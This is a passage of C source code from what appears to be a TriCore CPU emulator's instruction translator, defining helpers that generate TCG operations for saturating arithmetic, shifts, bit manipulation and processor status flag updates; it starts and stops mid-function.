gen_maddsi_32(tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], const9); */ static inline void gen_maddsi_32(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_madd32_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_maddsui_32(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_madd32_suov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, temp); tcg_temp_free(tcg_ctx, temp); } static void gen_mul_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1, TCGv arg2, uint32_t n, uint32_t up_shift) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv_i64 temp_64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp2_64 = tcg_temp_new_i64(tcg_ctx); if (n == 0) { if (up_shift == 32) { tcg_gen_muls2_tl(tcg_ctx, rh, rl, arg1, arg2); } else if (up_shift == 16) { tcg_gen_ext_i32_i64(tcg_ctx, temp_64, arg1); tcg_gen_ext_i32_i64(tcg_ctx, temp2_64, arg2); tcg_gen_mul_i64(tcg_ctx, temp_64, temp_64, temp2_64); tcg_gen_shri_i64(tcg_ctx, temp_64, temp_64, up_shift); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, temp_64); } else { tcg_gen_muls2_tl(tcg_ctx, rl, rh, arg1, arg2); } /* reset v bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); } else { /* n is expected to be 1 */ tcg_gen_ext_i32_i64(tcg_ctx, temp_64, arg1); tcg_gen_ext_i32_i64(tcg_ctx, temp2_64, arg2); tcg_gen_mul_i64(tcg_ctx, temp_64, temp_64, temp2_64); if (up_shift == 0) { tcg_gen_shli_i64(tcg_ctx, temp_64, temp_64, 1); } else { tcg_gen_shri_i64(tcg_ctx, temp_64, temp_64, up_shift - 1); } tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, temp_64); /* overflow only occurs if r1 = r2 = 0x8000 */ if (up_shift == 0) {/* result is 64 bit */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, rh, 0x80000000); } else { /* result is 32 bit */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, rl, 0x80000000); } tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* calc sv overflow bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); } /* calc av overflow bit */ if (up_shift == 0) { tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rh, rh); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rh, tcg_ctx->cpu_PSW_AV); } else { tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rl, rl); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rl, tcg_ctx->cpu_PSW_AV); } /* calc sav overflow bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp_64); tcg_temp_free_i64(tcg_ctx, temp2_64); } static void gen_mul_q_16(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, ret, arg1, arg2); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, ret, arg1, arg2); tcg_gen_shli_tl(tcg_ctx, ret, ret, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp, ret, 0x80000000); tcg_gen_sub_tl(tcg_ctx, ret, ret, temp); } /* reset v bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* calc av overflow bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc sav overflow bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free(tcg_ctx, temp); } static void gen_mulr_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, ret, arg1, arg2); tcg_gen_addi_tl(tcg_ctx, ret, ret, 0x8000); } else { tcg_gen_mul_tl(tcg_ctx, ret, arg1, arg2); tcg_gen_shli_tl(tcg_ctx, ret, ret, 1); tcg_gen_addi_tl(tcg_ctx, ret, ret, 0x8000); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp, ret, 0x80008000); tcg_gen_muli_tl(tcg_ctx, temp, temp, 0x8001); tcg_gen_sub_tl(tcg_ctx, ret, ret, temp); } /* reset v bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* calc av overflow bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc sav overflow bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* cut halfword off */ tcg_gen_andi_tl(tcg_ctx, ret, ret, 0xffff0000); tcg_temp_free(tcg_ctx, temp); } static inline void gen_madds_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, temp64, r2_low, r2_high); gen_helper_madd64_ssov(tcg_ctx, temp64, tcg_ctx->cpu_env, r1, temp64, r3); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddsi_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_madds_64(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_maddsu_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, temp64, r2_low, r2_high); gen_helper_madd64_suov(tcg_ctx, temp64, tcg_ctx->cpu_env, r1, temp64, r3); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddsui_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_maddsu_64(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubsi_32(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_msub32_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubsui_32(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_msub32_suov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubs_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, temp64, r2_low, r2_high); gen_helper_msub64_ssov(tcg_ctx, temp64, tcg_ctx->cpu_env, r1, temp64, r3); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubsi_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_msubs_64(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubsu_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, temp64, r2_low, r2_high); gen_helper_msub64_suov(tcg_ctx, temp64, tcg_ctx->cpu_env, r1, temp64, r3); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubsui_64(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_msubsu_64(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static void gen_saturate(DisasContext *ctx, TCGv ret, TCGv arg, int32_t up, int32_t low) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv sat_neg = tcg_const_i32(tcg_ctx, low); TCGv temp = tcg_const_i32(tcg_ctx, up); /* sat_neg = (arg < low ) ? low : arg; */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LT, sat_neg, arg, sat_neg, sat_neg, arg); /* ret = (sat_neg > up ) ? up : sat_neg; */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, ret, sat_neg, temp, temp, sat_neg); tcg_temp_free(tcg_ctx, sat_neg); tcg_temp_free(tcg_ctx, temp); } static void gen_saturate_u(DisasContext *ctx, TCGv ret, TCGv arg, int32_t up) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, up); /* sat_neg = (arg > up ) ? up : arg; */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GTU, ret, arg, temp, temp, arg); tcg_temp_free(tcg_ctx, temp); } static void gen_shi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t shift_count) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (shift_count == -32) { tcg_gen_movi_tl(tcg_ctx, ret, 0); } else if (shift_count >= 0) { tcg_gen_shli_tl(tcg_ctx, ret, r1, shift_count); } else { tcg_gen_shri_tl(tcg_ctx, ret, r1, -shift_count); } } static void gen_sh_hi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t shiftcount) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp_low, temp_high; if (shiftcount == -16) { tcg_gen_movi_tl(tcg_ctx, ret, 0); } else { temp_high = tcg_temp_new(tcg_ctx); temp_low = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp_low, r1, 0xffff); tcg_gen_andi_tl(tcg_ctx, temp_high, r1, 0xffff0000); gen_shi(ctx, temp_low, temp_low, shiftcount); gen_shi(ctx, ret, temp_high, shiftcount); tcg_gen_deposit_tl(tcg_ctx, ret, ret, temp_low, 0, 16); tcg_temp_free(tcg_ctx, temp_low); tcg_temp_free(tcg_ctx, temp_high); } } static void gen_shaci(DisasContext *ctx, TCGv ret, TCGv r1, int32_t shift_count) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t msk, msk_start; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv t_0 = tcg_const_i32(tcg_ctx, 0); if (shift_count == 0) { /* Clear PSW.C and PSW.V */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_C, 0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_C); tcg_gen_mov_tl(tcg_ctx, ret, r1); } else if (shift_count == -32) { /* set PSW.C */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_C, r1); /* fill ret completely with sign bit */ tcg_gen_sari_tl(tcg_ctx, ret, r1, 31); /* clear PSW.V */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); } else if (shift_count > 0) { TCGv t_max = tcg_const_i32(tcg_ctx, 0x7FFFFFFF >> shift_count); TCGv t_min = tcg_const_i32(tcg_ctx, ((int32_t) -0x80000000) >> shift_count); /* calc carry */ msk_start = 32 - shift_count; msk = ((1 << shift_count) - 1) << msk_start; tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PSW_C, r1, msk); /* calc v/sv bits */ tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GT, temp, r1, t_max); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, temp2, r1, t_min); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, temp, temp2); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* calc sv */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_SV); /* do shift */ tcg_gen_shli_tl(tcg_ctx, ret, r1, shift_count); tcg_temp_free(tcg_ctx, t_max); tcg_temp_free(tcg_ctx, t_min); } else { /* clear PSW.V */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); /* calc carry */ msk = (1 << -shift_count) - 1; tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PSW_C, r1, msk); /* do shift */ tcg_gen_sari_tl(tcg_ctx, ret, r1, -shift_count); } /* calc av overflow bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc sav overflow bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, t_0); } static void gen_shas(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_sha_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } static void gen_shasi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_shas(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static void gen_sha_hi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t shift_count) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv low, high; if (shift_count == 0) { tcg_gen_mov_tl(tcg_ctx, ret, r1); } else if (shift_count > 0) { low = tcg_temp_new(tcg_ctx); high = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, high, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, low, r1, shift_count); tcg_gen_shli_tl(tcg_ctx, ret, high, shift_count); tcg_gen_deposit_tl(tcg_ctx, ret, ret, low, 0, 16); tcg_temp_free(tcg_ctx, low); tcg_temp_free(tcg_ctx, high); } else { low = tcg_temp_new(tcg_ctx); high = tcg_temp_new(tcg_ctx); tcg_gen_ext16s_tl(tcg_ctx, low, r1); tcg_gen_sari_tl(tcg_ctx, low, low, -shift_count); tcg_gen_sari_tl(tcg_ctx, ret, r1, -shift_count); tcg_gen_deposit_tl(tcg_ctx, ret, ret, low, 0, 16); tcg_temp_free(tcg_ctx, low); tcg_temp_free(tcg_ctx, high); } } /* ret = {ret[30:0], (r1 cond r2)}; */ static void gen_sh_cond(DisasContext *ctx, int cond, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_shli_tl(tcg_ctx, temp, ret, 1); tcg_gen_setcond_tl(tcg_ctx, cond, temp2, r1, r2); tcg_gen_or_tl(tcg_ctx, ret, temp, temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static void gen_sh_condi(DisasContext *ctx, int cond, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_sh_cond(ctx, cond, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_adds(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_add_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } static inline void gen_addsi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_add_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_addsui(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_helper_add_suov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_subs(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_sub_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } static inline void gen_subsu(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_sub_suov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } static inline void gen_bit_2op(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int pos1, int pos2, void(*op1)(TCGContext*, TCGv, TCGv, TCGv), void(*op2)(TCGContext*, TCGv, TCGv, TCGv)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp1, temp2; temp1 = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp2, r2, pos2); tcg_gen_shri_tl(tcg_ctx, temp1, r1, pos1); (*op1)(tcg_ctx, temp1, temp1, temp2); (*op2)(tcg_ctx, temp1 , ret, temp1); tcg_gen_deposit_tl(tcg_ctx, ret, ret, temp1, 0, 1); tcg_temp_free(tcg_ctx, temp1); tcg_temp_free(tcg_ctx, temp2); } /* ret = r1[pos1] op1 r2[pos2]; */ static inline void gen_bit_1op(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int pos1, int pos2, void(*op1)(TCGContext*, TCGv, TCGv, TCGv)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp1, temp2; temp1 = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp2, r2, pos2); tcg_gen_shri_tl(tcg_ctx, temp1, r1, pos1); (*op1)(tcg_ctx, ret, temp1, temp2); tcg_gen_andi_tl(tcg_ctx, ret, ret, 0x1); tcg_temp_free(tcg_ctx, temp1); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_accumulating_cond(DisasContext *ctx, int cond, TCGv ret, TCGv r1, TCGv r2, void(*op)(TCGContext*, TCGv, TCGv, TCGv)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); /* temp = (arg1 cond arg2 )*/ tcg_gen_setcond_tl(tcg_ctx, cond, temp, r1, r2); /* temp2 = ret[0]*/ tcg_gen_andi_tl(tcg_ctx, temp2, ret, 0x1); /* temp = temp insn temp2 */ (*op)(tcg_ctx, temp, temp, temp2); /* ret = {ret[31:1], temp} */ tcg_gen_deposit_tl(tcg_ctx, ret, ret, temp, 0, 1); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_accumulating_condi(DisasContext *ctx, int cond, TCGv ret, TCGv r1, int32_t con, void(*op)(TCGContext*, TCGv, TCGv, TCGv)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_accumulating_cond(ctx, cond, ret, r1, temp, op); tcg_temp_free(tcg_ctx, temp); } /* ret = (r1 cond r2) ? 0xFFFFFFFF ? 0x00000000;*/ static inline void gen_cond_w(DisasContext *ctx, TCGCond cond, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_setcond_tl(tcg_ctx, cond, ret, r1, r2); tcg_gen_neg_tl(tcg_ctx, ret, ret); } static inline void gen_eqany_bi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv b0 = tcg_temp_new(tcg_ctx); TCGv b1 = tcg_temp_new(tcg_ctx); TCGv b2 = tcg_temp_new(tcg_ctx); TCGv b3 = tcg_temp_new(tcg_ctx); /* byte 0 */ tcg_gen_andi_tl(tcg_ctx, b0, r1, 0xff); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, b0, b0, con & 0xff); /* byte 1 */ tcg_gen_andi_tl(tcg_ctx, b1, r1, 0xff00); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, b1, b1, con & 0xff00); /* byte 2 */ tcg_gen_andi_tl(tcg_ctx, b2, r1, 0xff0000); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, b2, b2, con & 0xff0000); /* byte 3 */ tcg_gen_andi_tl(tcg_ctx, b3, r1, 0xff000000); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, b3, b3, con & 0xff000000); /* combine them */ tcg_gen_or_tl(tcg_ctx, ret, b0, b1); tcg_gen_or_tl(tcg_ctx, ret, ret, b2); tcg_gen_or_tl(tcg_ctx, ret, ret, b3); tcg_temp_free(tcg_ctx, b0); tcg_temp_free(tcg_ctx, b1); tcg_temp_free(tcg_ctx, b2); tcg_temp_free(tcg_ctx, b3); } static inline void gen_eqany_hi(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv h0 = tcg_temp_new(tcg_ctx); TCGv h1 = tcg_temp_new(tcg_ctx); /* halfword 0 */ tcg_gen_andi_tl(tcg_ctx, h0, r1, 0xffff); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, h0, h0, con & 0xffff); /* halfword 1 */ tcg_gen_andi_tl(tcg_ctx, h1, r1, 0xffff0000); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, h1, h1, con & 0xffff0000); /* combine them */ tcg_gen_or_tl(tcg_ctx, ret, h0, h1); tcg_temp_free(tcg_ctx, h0); tcg_temp_free(tcg_ctx, h1); } /* mask = ((1 << width) -1) << pos; ret = (r1 & ~mask) | (r2 << pos) & mask); */ static inline void gen_insert(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv width, TCGv pos) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv mask = tcg_temp_new(tcg_ctx); TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, mask, 1); tcg_gen_shl_tl(tcg_ctx, mask, mask, width); tcg_gen_subi_tl(tcg_ctx, mask, mask, 1); tcg_gen_shl_tl(tcg_ctx, mask, mask, pos); tcg_gen_shl_tl(tcg_ctx, temp, r2, pos); tcg_gen_and_tl(tcg_ctx, temp, temp, mask); tcg_gen_andc_tl(tcg_ctx, temp2, r1, mask); tcg_gen_or_tl(tcg_ctx, ret, temp, temp2); tcg_temp_free(tcg_ctx, mask); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_bsplit(DisasContext *ctx, TCGv rl, TCGv rh, TCGv r1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp = tcg_temp_new_i64(tcg_ctx); gen_helper_bsplit(tcg_ctx, temp, r1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, temp); tcg_temp_free_i64(tcg_ctx, temp); } static inline void gen_unpack(DisasContext *ctx, TCGv rl, TCGv rh, TCGv r1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp = tcg_temp_new_i64(tcg_ctx); gen_helper_unpack(tcg_ctx, temp, r1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, temp); tcg_temp_free_i64(tcg_ctx, temp); } static inline void gen_dvinit_b(DisasContext *ctx, TCGv rl, TCGv rh, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 ret = tcg_temp_new_i64(tcg_ctx); if (!has_feature(ctx, TRICORE_FEATURE_131)) { gen_helper_dvinit_b_13(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } else { gen_helper_dvinit_b_131(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, ret); tcg_temp_free_i64(tcg_ctx, ret); } static inline void gen_dvinit_h(DisasContext *ctx, TCGv rl, TCGv rh, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 ret = tcg_temp_new_i64(tcg_ctx); if (!has_feature(ctx, TRICORE_FEATURE_131)) { gen_helper_dvinit_h_13(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } else { gen_helper_dvinit_h_131(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2); } tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, ret); tcg_temp_free_i64(tcg_ctx, ret); } static void gen_calc_usb_mul_h(DisasContext *ctx, TCGv arg_low, TCGv arg_high) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); /* calc AV bit */ tcg_gen_add_tl(tcg_ctx, temp, arg_low, arg_low); tcg_gen_xor_tl(tcg_ctx, temp, temp, arg_low); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, arg_high, arg_high); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, arg_high); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); tcg_temp_free(tcg_ctx, temp); } static void gen_calc_usb_mulr_h(DisasContext *ctx, TCGv arg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); /* calc AV bit */ tcg_gen_add_tl(tcg_ctx, temp, arg, arg); tcg_gen_xor_tl(tcg_ctx, temp, temp, arg); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp, 16); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* clear V bit */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 